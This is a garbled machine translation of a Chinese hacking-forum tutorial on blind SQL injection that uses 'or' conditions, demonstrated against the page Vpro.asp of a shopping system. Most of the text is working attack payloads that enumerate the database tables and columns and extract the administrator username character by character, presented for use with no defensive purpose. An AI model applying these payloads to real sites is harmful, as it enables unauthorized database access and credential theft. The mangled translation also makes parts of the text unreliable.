There are new or injection tutorials in the website. You can find them and see them together.
Author: fallen leaves flying & Huaxia chicken head 4 [s.s.s.t]
Source: evil baboons Information Security Team (www.eviloctal.com)
Note: The first Script Security Group Forum (www. Cnsst. Org) will be submitted to the evil gossip information security team by the original author. For details, please indicate the first site.
PS: It's been a long time. The article was published in April and was recently modified. The article is a bit messy. Don't be surprised.
I remember a friend of Firefox asked me a year ago, if one site filters and "", how can it be injected? At that time, I casually said "or injection". Later I read the Post and asked him how to use it? I wrote a few simple statements for him and told him to change his mind. He was very grateful to me and said there was no such method on the Internet. I checked on the Internet and found out that there was no or injection topic (except for or 1 = 1). So today, one year later, I will have this article.
We use the thunder Shopping System for or injection demonstration. We first use or 1 = 1 and or 1 = 2 to test whether there are injection points. Let's first look at the normal page. We now use or 1 = 1 to test whether the injection vulnerability exists. Another page is returned. Let's test or 1 = 2. The returned page is a normal page, indicating that an error occurs when the guess is correct and that the guess is normal when the guess is wrong. This is the true "false is true or false ", it's more classic than lake2's IP spoofing.
Let's construct the test statement:
Copy code
Vpro. asp? Id = 1 or exists (select * from admin)
The error page is returned, indicating that the admin table exists. Let's try another table!
Copy code
Vpro. asp? Id = 1 or exists (select * from n0h4ck)
The table n0h4ck does not exist.
Let's continue and construct the statement.
Copy code
Vpro. asp? Id = 1 or exists (select admin from admin)
The or 1 = 1 page is returned, indicating that the admin table has the admin field.
Copy code
Vpro. asp? Id = 1 or exists (select padd from admin)
The or 1 = 2 page is returned, indicating that the padd field does not exist in the admin table.
Now we start to guess the data,
Copy code
Vpro. asp? Id = 1 or (select mid (admin, 1, 1) from admin) = n
The page with or 1 = 2 is returned, indicating that the first character of the first data in the admin field of the admin table is not "n ".
Let's try again
Copy code
Vpro. asp? Id = 1 or (select mid (admin, 1, 1) from admin) =
Return the page with or 1 = 1, indicating that the first character of the first data in the admin field of the admin table is "a". What will happen to the first data? Of course it is "admin.
Let's use the left function to determine,
Copy code
Vpro. asp? Id = 1 or (select left (admin, 5) from admin) = admin
The guess is correct. It is indeed admin. Well, I don't need to talk about it later!